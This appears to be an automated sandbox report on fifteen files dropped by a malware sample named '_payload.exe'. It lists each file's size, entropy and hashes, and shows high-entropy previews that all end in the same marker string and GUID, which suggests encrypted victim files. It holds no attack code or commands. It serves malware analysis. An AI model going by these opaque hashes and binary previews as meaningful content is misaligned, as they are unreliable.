                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):760
                                                                                                Entropy (8bit):7.661800583799298
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:HA3MGzPrjB21V8R8R+vWnmbRzoNfQ95esn7dk0+ruevw+Yqh2inGW7vEgJc3ciik:H+1zPJ2Y8mYq5e27dv+twCJdEx3bD
                                                                                                MD5:25E118C20A8FEA23D414745B019E1174
                                                                                                SHA1:F9FD48C817B5E8B145927B7AD6210526C706865B
                                                                                                SHA-256:1D20C628A95D096C0135B8BDD4E652A0E48AF5A3DE92E23A317173EFFB51AF91
                                                                                                SHA-512:3348B8686B0E7AF8617C3B76173857A97B5A0C21E7C887D25981C3493F0500BDDD91EDDED7ED785B1079C7AD542009180117C90A52A0373080004EC39A0879DD
                                                                                                Malicious:false
                                                                                                Preview:<?xml>...N.[f. ...H[.hU...E&..g.^...._...1.(..1.:.#.>5M#Bo...T3.U.+.f$5..[.....L.@]....=.LHeC7....@...;*.k9z.6.......8....@.:1&.._.8.r...Cy.c....9.\....U...h..5......;6.@...!..>.....C...s..w.....b..h.......#......c...t/w+....&....Wi9r.....,.".lr...\s.....:k.av.a....R.....9).nk....}.3..@;^].{...|..L:..9...0.0..}.h...,fM.y. . ]...}l..7.|M.Z._l..?w;.)v_#|c....-..Mh.06.D.!wX....5=3.X?.'.K.....R..\..UJ".7s...}.K.l,.....B.'H......G?+.J..F$..,....oo_...Al...4...|....[.9./B?y....s....n#b..]..T.D...z..%.........iR......v.h....c.!G4L.m..(.8.jk..R.+.x.....M"...w.c..-...iglA*{.OS..[ ^.3..w.O.V%X......z.......k}.f.^...Rb..=W....Wb[....P.+\.k..b=v...BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):819
                                                                                                Entropy (8bit):7.730256518403887
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:WDd6FO9velx1WoMbn80eqAk2np/jEeG9goSx3bD:ad6NLWoMT80eTprImLD
                                                                                                MD5:81B2EDC41E26D6F52DDE72C1E9227D29
                                                                                                SHA1:34A8D546E28EC3F56DDDA285447AF20AD93E5F88
                                                                                                SHA-256:3547600B62284AEC7FCE1C1CAC6DB9F8FFC65673A97CEB7CF24831E73E0F65FB
                                                                                                SHA-512:067DAC76AF946E86CD0BDDCDF82A474EA35EF63E1AFC7758A8BB1579F14A810188F51D2F82C3F943542AA0CC6762BC29BC873D9BBDB67253F96EF917CF138907
                                                                                                Malicious:false
                                                                                                Preview:<?xml...8.UZh..-....9.d.#.3.{-.....S..V.Hp......Iz....oaPxb...H.5..T7...B!...I.L5.d....qNh... 3T.o..m..z..........V~EQY.G......L5!...W..n...1...hT...}.k.../..g..Y_.R..........sj...........g+M.*8.J.}.q.`.GAQ...g..B.`....P..>..T..(...4.0gn..W.k........p.r.~h.D.,.:u...B\A...6.&?/b>.g....S..6.>. ..5ZLJPH.<D..n...W.......^g.<.....W.X0..@.....K`.N...[3.!..b.E,.x#....u...M.S...A.._..*..02cB7.8... K.O=.c...m~o..L.;..n..^..CA[[...&pk. z....I......^>...yX:.5z.|../.m....f....- ...!t...+....;...Rg.m......Of....../Oq.....46.3.Sw .&q1.%...6x.[...#../.f......cX..w;j..@..$;>....E.:l".2q.u ...B.|.l..7.....X8.....<...?......\c...^......C.2..7..M.3J....K>.2h.P.X......i94.&..r..ai..rQ.y./.!.....5@....U:&.r.......C.aE#.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):740
                                                                                                Entropy (8bit):7.673012275611165
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:XedQgzL9mzbyRHXOf2kCR/eVeGx9XBEd0pNZCwAj/q3/hv/bm/cOYlIV+vuc2ggS:gQgzLmyFX6255eVvx5BEwfADqZbmgWVk
                                                                                                MD5:95AE9FE4D44FC400E5C1D178945F026D
                                                                                                SHA1:7B94C6118BA481769C9D8EBF66AB9FDAF33E5997
                                                                                                SHA-256:8F4FED900669CD840CF62A88FDF7F0E99B306D70F9C570AA4B858EF7B8778643
                                                                                                SHA-512:AF615427778D272AFD67DC4D184A250DB9EBC909921D0035D60E0F52F0CCFEBA28AAB5F9EFA3DC9DAD7D87A998AB83C857AFED001B5590547F349F80B8083541
                                                                                                Malicious:false
                                                                                                Preview:<?xmlLKg.d.O..K.pQ...g.Q5.Tt....`..5.?bDw....l....!.J4..d.<.4.Y.........Gy.P..@0.KBH.Lh...|..w...pOsJ...?%jO...4}8.b?....G['.H..9;;.vo...~.#./s....l.A......4..Y!H.....I...4V...9...r.q?<.E. v[..9f.7..v...... -..S.b.}...^........v....h....0H..W.3.......8..P........b..?-9.U.W..)...R......b"..qR2.....=.z...d!.x...._e..a...7<.x.Z.9.*00.(^.y7E....]..0......S.>.H)..\....Q.W.K.9..g.....wY|U....H5...3.E.z..~.ZM.L[..q.x...T.h..(...-..!..O.h&...'.Xj.[gL.0..A|I.S..td.j.yM.Y,.......>..kp.!dg.R4.....m.jw._....:].....3..L.V:....]..721l.]....Sa...e<N...e...5...W.....U..&.Z...#?/3rX-.e.[."W.......x.sW.Z.....q.Nn...H..@..#....7/.....PdUs?.kBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):802
                                                                                                Entropy (8bit):7.706870462306895
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:b4vE8EyWCqr6YeTp8ImfEiONAvjlWSvxLKoJo4dTI6/oNaCuhAjh2FwPagJc3ciD:bz80odZmfEipvUtoJfJ/o8c2FEax3bD
                                                                                                MD5:574142E31494A484977A3378559340D1
                                                                                                SHA1:933EFF6FADAD36EE227AF4BAE8F1B2F8F1F06E90
                                                                                                SHA-256:4DC4A8448CA28A60CE84B3BF3E6A94CD52D5B3BCE0BB5A0826B48A7ED982CD90
                                                                                                SHA-512:C9EABC32760E2BC018ACC89919CD9550436943846C0FAE6B514A340E7FF05B7CD6E9766BC1563F3F9DCD3A0E1C8774E20223297B6691F8C8BB571BD691D4294E
                                                                                                Malicious:false
                                                                                                Preview:<?xml".-.....g.$j...C..t..?...d....n....`....pU......h...gwvzN].7H.u72..Pb(l....E...G....o.k....."N#....w...m.....c%..U.m.)..m......'5.....d......F\...1..#8..%U.n.V.a.o..DcYY2\.;......ev.vb..&..^.T#;....X...;..!.6-%...&>.C..].m1....R...S..W.......iwT........b)h...L..V.WlF#4....S_...B.M..fyz.......&..^...QqK..[H".g..v..xt.Z_../..!G........I.6.et>CVd...o.)v..d}S`..o.....4<.@.s.l.....M.....Z&>...]ao+!t.m....$...+.-.`q<.>........_..F.X...?.j.R..!.p.......=3....1...[{.[o..g.D..y.<....3k0...3.<@...2.>.Op..=.v.+%...J.........Z...Ua........a...`H9......<.Be.M......._..[H.r..\e[.X.8K..6a..n.........6s.5.A...-^.G.I.xDt......r..;.L..N....2.~...PC......%.3..$.Q.Q.D...a....."K...9......w.c..PBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):748
                                                                                                Entropy (8bit):7.699608559154878
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:4wfmAwIVSszrP2BVmvUwge1jkY2NDO7hWPCkNZIztjZuOvjSf2gCSRzkTs7ySgJ4:4A3wI5Psm8wX1jLPBxvv42gHQsOSx3bD
                                                                                                MD5:0EAB42DB742A932AEEB9BC9DADA17643
                                                                                                SHA1:99555F0387135F45DD60525EB26FB4B1791D3697
                                                                                                SHA-256:787A178AD22C7A507A2D462C678A392D4D66AE95479C3AFFA2DA9902AA3BDC44
                                                                                                SHA-512:ACE45E504AE2B77063931F8897CF4A410BC5A1C8D7163786537CF964E69E6A24D691A177F9C8BD590B55BDCAB626CFC7B73C67C3D2654B75613FA162A14BBE77
                                                                                                Malicious:false
                                                                                                Preview:<?xmlE........7..X...GX/.rA.;....;\.B.....O..*.:;8..Z...(....8k,...-v.(....K....(-..)<&....g.<.Ox9.H&DW[..`g...a./8.X.Q...t...'.N.IU#.....@.il..:.~...] .qH.#....v.W..N.x...oD.N%iR;2.-K.`...2.d....y.l.....wacD8..9.s[..0...]&...=...k.^.....G,.1I..dZ7}W.\v.pB.m9.9..o.D.bx.l...X...~.n<....8...W.L.G.a..../Q.>.....>..].[..xC....,Xk...(6.!.9...PM..(a.!...n.!...K}yW-..4'd.....jq).#...>..<*...a.......z..jj......F..I..........."I.......R..G...q8G.!.;......{.D.\^.`y#..tP.=%.....}..q.8.....M..3.(..k.Z.v..D........z.......tj...O.bx.. O.!.]....[nM%5_...$..(r..w...*....^......C.....w..]}.G ....I.y.J~...d..t... ...R@..VUCM..z.=.......~Fe+.....#.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):810
                                                                                                Entropy (8bit):7.732149092681285
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:EaA0FoNobqqZa0GUjkFp6gWuWF/OSvx3bD:EaAaGoGqZZZjkFQg9WFpJLD
                                                                                                MD5:D78039146E8CE49BD0D6A1AF847D5647
                                                                                                SHA1:36B27B45A121BD74E275BC8B4D439CC987D89B00
                                                                                                SHA-256:F5E6A5A7A9523DCE9DFDC19BC9C4EA624F50233CC432F15A26CE4BF9FF34C768
                                                                                                SHA-512:CB008FBF138F1268A9E585723842AF9610A06720D2DA725716D1A4964E84C9BA412CB4EF77AFA6C57ED2D9A7D6478EA6048BD543AFC6CACD2664F8097014D73E
                                                                                                Malicious:false
                                                                                                Preview:<?xmlC.s...S......I...$.....<. {.5!..KTL'....B\..)...........LSvb&lyR.v.%.)..Z=./...>j..I..........i:....d...h.k..s.g.;.../.@...4v.....g....-.`E.......~x.W...d........ n......C....H..vrT.A.\gi.B......T....6x....%.S..>O.Uc....Q............ST...H..8..#. ..-...^.E.[.w.E.F.5.M.{.i..O.?;X..j$.].......Z.g..a..). t.......|...j...<.0_4....*.0.W.gS..qc4.z...c.NG.~.5..;...............KF...}.A...Q... .l.tk?.~ .O.1.3.A.......W.....N.....*.9>...?.-...,H......Z...*Iu..Z=....#.6.4a.)..9P..w..UH.ri..%MHX..6.Y.VR..0.........T.x.+#pU..Gv.+9`S...8...J...)3<.<.<... *].y....v.I..q.y..XH.&....v....<7.L's..5..>e5...6..#.o.J..'...]9LGm.{6d#;..s73.G..).o.......n(qA..L.....u.epp..z...f3.A..,..2...B.F...:....BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):797
                                                                                                Entropy (8bit):7.6928458307969745
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:aFiz2FkwUbVdq9SCKj1TqbbjcEKioakh3bpFf4o+OsBMaKmb4Ed1GWQXdSKAgJcn:ak0+ULeGb013rf4ofkPbQsZx3bD
                                                                                                MD5:AD5166074F88BE914230FFB44682D9E8
                                                                                                SHA1:182F64CF906CA7E3130AF170B064F781C0E75B4C
                                                                                                SHA-256:73DC40B005324583B4AE0D958F66EBC8B79F27933B76135C3F9EFD5F372810E4
                                                                                                SHA-512:AE93907ED31AB653AA84B673178F0501DF7196056C0C81BDEE3AC849382A3FD99858E7314F2A3548638EA5E5CC5CBF0976D5747B58293D32B59138225A52D5FC
                                                                                                Malicious:false
                                                                                                Preview:<?xml..OB.P...Y.T.T...z......[...L.....>a._.Y..d..hQ.+5...c.N.....+....[..]..N.K.;.2...\.......](.,..l/..JHJ..V'.....)..J...&.o..6;..f....C.Ij.1G.....,......._"BX.w.$...O.B....,...C..7.e..Q.g...(.....J...c8..3mz..!.-.'..4'.,.H..A..6...o.w..A.A....$.?%.T..K......IU.......}6....a5...X..2......C..R.n..-.r..ub.)F.T.DO^..>.x<s..v.8%..DP.....(...Ok..&.;..1..i..VfR........U........G.;b.r.......9<.g]u...|.LR.s+.Z,.....o9z..rD..g%m.V...o.."H.i.D.zj.d=.@.CHbP....<?G........X.|..^...7.U\..qP......v...K.o..,s./]Y.f...a...I..2....YP..u.5....$_../...r.../.8....F.~.6W..6R.XjE.jCy..a.Z.........u....bX...@....Sn."I[..._.}n.a..Q.]J;.3...rj.uf..H.,iY...b?.KJ..f*...;(..OR...n.b..V.\..{..mk.07Q6<.`BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):827
                                                                                                Entropy (8bit):7.7465434894779435
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:tXZp21q5eSA0OlVWIH0XuJky+ms4fWTovgO1C+sVv6jNvT3gDroUY/FAgJc3ciik:Hiq5m1hvJ/pfeFO1C+4ENMroUjx3bD
                                                                                                MD5:0DFF843F82AC7D5B4AF57423CE9FB1BF
                                                                                                SHA1:57FF899991574D5C349E2A3A6D941AFE11948629
                                                                                                SHA-256:67F4E3D125EE3C4600D1E5642094CFCD4F2180DFEDE3C85671369D2B81D7C3AD
                                                                                                SHA-512:F92A3DC2D4AC54DA02B529C77B7D29458333B1641D8CA547C215487283B105214941D1540F17C0252AD795BF4AAAA7B839DB9E7D47C4B923EE4D36D2FB40C9AC
                                                                                                Malicious:false
                                                                                                Preview:<?xml.h>......!.?...-".53..Uz..+.W"j.c..".....w..._R..B._...w. .....aA.........vmYc.1..%2...M..,.....-..f..N.m....Q.\b.{.....<"...L2......z:.uOcLNj...o...|...?.!,.-...bA... N......x^..../}.......D.Q.g.i...p..q.eg...i.V+........m.!.a...j.5j.`.$......e..`"..j........S..[...K.......pQ..._F.N..... .....r$.tR.O......l.Tx.^:./.H.2.....j:.#...).....$.6...*e..t..eC..9.FZeu...|.../....d>Gn...R..z..<.#..f.V.:Y.c+7.....9Ac.9....."....&..s`.0....J..O..E.U%ZYq.p....h/..E....{.i...d..b.o..v.KN....#.y......p. fYH..~..M`(......`....7|5..'......e....v..>.z..#>..%M.....Ig.n"...-..".Qd.P.....R.0cms&K.*f1.G.0i....2..fD.!.Z.Y...x..."...dg..h~B....*9........i....f..Q.:..z.....ZpI....vA"...}d....k5I3......odg..........SWz...BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):752
                                                                                                Entropy (8bit):7.689146489414053
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:w/fRn3E1oKgLUevoaR7yIh0m0KUZSff9vnSU9nmEFUM9Zpr/uokckDIiHvz5Moxu:wRUeKgLNZb0m01ZYSKUKrGNck8iPz5l8
                                                                                                MD5:3E7FFCC59B71DE7F131E08BCDD443A2E
                                                                                                SHA1:31BF7536E10F9B2C0F6161741F8B31F5FDCD32DF
                                                                                                SHA-256:C82904E225C4E09E4D6821AD77439F7ACEE726DBA02669FD6C14037082ADA924
                                                                                                SHA-512:2DC19363C0DF5CDD83C05670E05001CAE193C2F40134B92753826DCF44EC7CCAC255AE2E80A39674D99D480F73263D151829A30938920E881AE68701159470A5
                                                                                                Malicious:false
                                                                                                Preview:<?xmlM.O..5....A*`olHn~n......V.\......Ybf..0`T.hf.p..&.I...M...C6E.${..@.R....G&8...6....D_'$/.I...Fd..\L.WR.%.3.9..<C.Z/.R_tr.K...yb...0..|........xN.. ./Z...*..-.....vl.'..5at...E..L.,..[.1..z......KC7.77=D.K......uJ.....i....=......T.o..G5.n"..Q..)B<......9K.3....>..q|..\....,.T.V..K..f9.."q..k.V.2...^.........%[7..t.8.<.C`Y...$-N`%j..w{.....2|.I.@......Z......7.6....S.v.....g.>7..........Gmf..Q....a.Ec<.o..)=.*<.k..C....h.....;_.....O.."..}.9B.._}.B.Q!p..R.....|.l.."......$..]..G..M...p.|Qn..,#.w.<X..<../+jN.].S(.e..U.od\.:7......K.8....5o./.....)M.C\...".Ymc<....WSu.Y..-....P....<.Li..Xi.y.p*..g...o.^..\..&..C_).^k.......9U.X.a.T.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):805
                                                                                                Entropy (8bit):7.700907544783923
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:K3uK7Ej6Mu6T5TLsylrRftcwOlrEMvjW9iDJpWThwrx3bD:Ke6MHdXtJOlrRjDuTG1LD
                                                                                                MD5:B3A18F90A9E184444437AB15E3B7EA3F
                                                                                                SHA1:FD20908C781E3989EA5DF9CAD9D1024D1B030006
                                                                                                SHA-256:EE630EDCF2F57FBB5F7E63E99560DB958E94E667460A134E927965BBDE88DB64
                                                                                                SHA-512:91CDF30A3FFA14AF193AA5C334100E02B899F482E2948D29AD9278295BDD20B330E851EFC3661D267AFA4CB049C7C0597DC93FE011B39DBAE096A3628739A66B
                                                                                                Malicious:false
                                                                                                Preview:<?xml.j..u........U.........9.. . ..*.."...<.A7...+.....=MCO...e8.[6.r:=Xy".W..&...R.8..`....wi..d..D[{. ...s..!.99...3....TK.|.I)&..Cl....)m...[?.0.3..f^.C..(.F......z.j/..X.|oP.K.....8..zZ....'..iL@...'.-. ^.....K...Eei1.sJ.R.f...(mh.7......3..fji..9-..].....0.....f....V...rH,.B\.r.....pK.......p..".]...fH?..qH.{#....N..@..x..Q.(|^j....;M..8...]E.......H.0.[.H}2..W,A..4.+.sF..@JNzfy..u.E.D...,B..L+>..O..z`..c..C3....N.*e..o....l-..R-.#2....@..$..X(.#......R&... .w.=.......i..Q..C.B......t.1-%sF)F....~I.!..'.....Gt{rXr..A=;..!.b..R..7[.../..m.WgP..$.+./G....j'4~..^<.d..S..t..fu....}<s..#23EE...R..'..q#R...`?|..i...F..t..b..d...%.{z.....L..S.(.Lt|:...JD.B....>..{..........so.V.R..4.DBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):737
                                                                                                Entropy (8bit):7.672862816963388
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:QNl58pq4UE4fBUGTyoBbx1j1UeWXdi755lTkQ+pzAJbdEtaQggJc3cii9a:QNgqCsBUGhBFzPWk9rTU8JbdEtanx3bD
                                                                                                MD5:84DFA7CCD9753CC9A728CE63320596DA
                                                                                                SHA1:6F951963D6BAD812795B1C4CA463D49B2D420030
                                                                                                SHA-256:CC85B0C67B1D1C048139CF049D09061EBE79D783817891CFC11F09EF76623172
                                                                                                SHA-512:04BE539EB78F730358347E442B37A6E9538B328B335620BF483BBD909EBF24941606630E15474CFB1D09736CA43E122675638A223CF754A4D7E71F3E6B75BB7C
                                                                                                Malicious:false
                                                                                                Preview:<?xml<..Sw..N..L.Re.2....(..oq.L..."..sK.s.2.v&......r3g.\..5...Ih..-....;....oc>m.Io....m..l..._I.j......a.x......n..+?..E?..O.H.t..Q.Ky.A........9...r..zs...Z...v.-...U.....^..1.+\....B.. 4 m$..j..n3F...L..L....@..fCDg.Z.$.B.l.X..h..\`..$.'<l.........%..QC......./-.A...."k.A.*.`I\.........{CSyX./.8].....Q....M..R....j7T......h...m.%....b..'7>..&N..|.)sT..g..p).y.!d.~T.+.=..4...w5.p.6....<...'...&.{.+M.L..f.1...e...W6........;&=2.f.$M.*].>1..`./.."......K.G..?z`...2..~...!aW....v....s..*..2.2B..".f....x...uf.6F.....v7?..).8...8.{..T.'..VN.L.&..5..5..xA7..qX.E.A`..f+.g6z.m.<....k...}....v*f..%.....x..<...'..A.h.AwiuX.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):801
                                                                                                Entropy (8bit):7.684629202310683
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:BQuvTOFjatVqODVb25a2Avs1J+dl7hBmx3bD:BQUTOJqQSb2HSy8+LD
                                                                                                MD5:C913DE1080FCC14E913D356FD54D7A59
                                                                                                SHA1:BB1443EECB306223E59DBAFB1A7146821B27D7AC
                                                                                                SHA-256:3617CE9F78D1F2408E431B160393CB313F73D8EF3D3039CE0662502BF48B4DAF
                                                                                                SHA-512:22F2022121904E871E200BAEEFCF2DB62B8711711E6C68C1C7DA29C21F408F08FCC0686005883A8D0228F2588BB404D605F085086D0B026217A5480A15C009E3
                                                                                                Malicious:false
                                                                                                Preview:<?xml[......[...y.a./l....a_#...%.C.......v5.j.s....h...W.....db...Q...m...o......m.k'..>.H..n.d.K..I.._.$...*..:.....T._..\j....%..X.].k|.n.r.J...,..../.1YEY..(>..j..)e..;.R.YI.>..%....A~~'...|e>).7...dc...u`Yu...l~.0q..Q?...w5m2#P..)D .<%~T...U.)]...[..E2F...... ..e(..6...X..Mp_.g*...%..?.......'.%.Jy.......W'.0p.kgy..,`e...'PN.....C....+.Y.G&V.l..*.....HhY.mnRU..K....C{a>.u..Ey..[.@J.V5............P..2...iSZ(.{d.Of.yV_F.R)...ze0.|...P.xS}...YF^..b..*Ku.q...~L.Y...=n..q...f7..GP..7..`...-..e...f.....]....xZe...l....j.&.c.. 1 r..kU......_.^.._PQcu..{.yM..>..0....4-kM..**.T.t....MK|e2..u.'.6.(.`(hE.kR.e....TZ*.!..cp..$.9....9:S.WX......4..;K...j......xl...!..$T.e...HBn...@.4.2RC.ZvFBUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):761
                                                                                                Entropy (8bit):7.658936195945876
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:mU3V13qAkGSfpg+fsRpq9OzU4kkDJ0dV/uUnv+rKg9lMT1a6KDg0r9r52v1gJc3X:mUv3qvg+fUnRAdgCZT2Hh9Ix3bD
                                                                                                MD5:949384AB482794BEB11568C7A70129F1
                                                                                                SHA1:BB38E1C2D7BC6DD3F2893AA02361E5853D145DFA
                                                                                                SHA-256:99F602B8A5323339A5ECC8036E16BD951115CF4288BD748C972A8E6D57ED4A86
                                                                                                SHA-512:035985A99AEEF10FC59EA6A12C713581DC5FB4811CDEE2193AD420E87A9EC41165DC214FDCCF8B87425E91076BBA63B44EF0C39F1ADE6A3A624DC60E757CE4C0
                                                                                                Malicious:false
                                                                                                Preview:<?xmlo..au........%.y.+.._...P.....M.B......+.v..r..1T}u6..m.%...`..;...-...uc..$...%.-.'...|I... ,.+.2..%;...$...Fc.b5+1L..(..L.c.C[.x....[.x..,..v.g......\VL....i.M....\...+.Z....y....+.oKQ.Y.a..V..b..d..Eo..71./.+.._.l.S...l.x.N......{.d.......|.Zo..eIH.Z.C...v.q_.b..E.a"}..'9...[.s..z\./y...Va..Z..+....i...z.J.......4B..;wD...n.........d[.k.....>..h+{.1.............?v.......;c.q....r)$?....5..C....l.7...Q....M.K^\w.zO.g....l.{...;..w...R..t..0.JYR.(.H/\.\..np......C.D.]BeM.....a..o..F....a%.c.}..W..B/.L...^4.|U...qCI..h.aA..8.&OV.......<AbUAs...G...U%.$$.|M....g......#.(9...;.p.V.g.u.8..5..K.{.7...e.V...g...].c....|...y......BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):832
                                                                                                Entropy (8bit):7.725794739292197
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:kDAa449NJRzqr7YTJUojcESPfROUDAJux3bD:I44DJpqvYEE+R3kQLD
                                                                                                MD5:5954234D06198DB731DE3446EE4F20DC
                                                                                                SHA1:640084258E572DD22F5C2770B59DF5AF81759A13
                                                                                                SHA-256:72EDEB82F781E50E1590AD8890226CF152A87E3A97861AD7ABD41A129B1FFEBD
                                                                                                SHA-512:F30DF301A02BB35BE784F0172F3859A3D785C63A0B940B5652434756D353E06F5FF96B0B6C2D4198169F3EDB05DD4D6C46DEB7403DFA14C045D10D9147D26D95
                                                                                                Malicious:false
                                                                                                Preview:<?xml....k.{6....Z....iBgs`..."*.&.~`...r........|.....Z.t.....|...0.X....L....?]....H.k.|.VCE==:.,UO1(..764KC.?.......<T.&g.7.,HI.....(m.C....3...PR..W.?......:.L+L.. ....... .)@.....\3}Lb..E'.U....m......>.B:..}...N3.......J.\.<..K..Om.t(...Q>....~.pm]~..n.9<c2.b3..6f@.. .T.....\..F....l..)!...P.{R.y[9Gq.I....i;0I.a-\.....;.e....I..o......{..a.{..H.~..$..O.I...DB..0...H%...Ec..9.......Jm.Y.?.fY:w...k.e........./N.Y........h..a..l..s...z....&.tF./u.fF..2..L@.4.r8..`..~.....+......}.Qs.......'.".......;Q.SB...U..;.5.g.1.....o.h.d.v{5M.\4...j....r.k.R...P.e..F...3.^.......h. >.S.4...sH...+.:U:....I^...Ni.8.........h...*.. ..k.V.'.s~...v..w.4.].g..j...c.e...@..w.b...)..H). l...D..D..Kv~9N.X...!?...!.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
                                                                                                Process:C:\Users\user\Desktop\baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_payload.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):748
                                                                                                Entropy (8bit):7.646486373324644
                                                                                                Encrypted:false
                                                                                                SSDEEP:12:okWT2O5OougP3hd5e3QGWSbB1HoK9FMwD0U2q1QBXM+UHRCUYRCMXLB1VhNED1gS:okWTpsot3hbUQsh5HRDSq+1HUHgCMXLK
                                                                                                MD5:FBF82162DB5DDA4EBCBF3B219935167B
                                                                                                SHA1:FAE0BB6D3C12F9D58A4B8158146469D01DF89147
                                                                                                SHA-256:DF20BDC4C2B4265055683DEEB2101BBC9C2C6392787E978959BF3422C89EDF36
                                                                                                SHA-512:2F979E6199E7B6139F4CD9C20BD2B5D2D777C659CCC33350419DF0913C9ED768CE2F2A0CD7DACAD77A96AAF3FADF35B98DEE640BAE64E9117D6F8F8AD5331B75
                                                                                                Malicious:false
                                                                                                Preview:<?xmlU..N.;&./.-......t.\+\.L.N.I.E8o.."..V..F.hYR...?"#N.*.f.4~"...l.hkz#.E.'3..}X[....)....{dmL......c...0...R....j.......?.L/.[..]B...4..^..../..#.(.q....}...Z..lh...Orf...;...."....?..Im0..M..(7.aD;w.....5..i.LJ.....K.+...~..'..I^8@....KC.A..hGV...o.e%.a8....I,..w..N.L...+... ,....tx.F......N...2>..L.B@Jf\s)........$.u...V...[.H.~.P..W..[1dT......m....?.. zlif..(|h..F.z./..I...u.~...;.dt.O(.y..o......*.z/gl\...1_...Y.):.......Ey{....<2..\..F1.....?....w.G.[8..,Q...;.vE...l.>.......~..2.........S....I;...V.q.JeJ...0h.\.,#..tU._sNv|.(..y..>.D. .....e.y.]K.?!Gv.i.....t...>...[..J9.#..\.qK....N..W(da.C....N..n~k.....vU..\N..YX..2.BUcuB8PRg0LNi380axIJs5BS8nCUdeo9U88L2Lt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
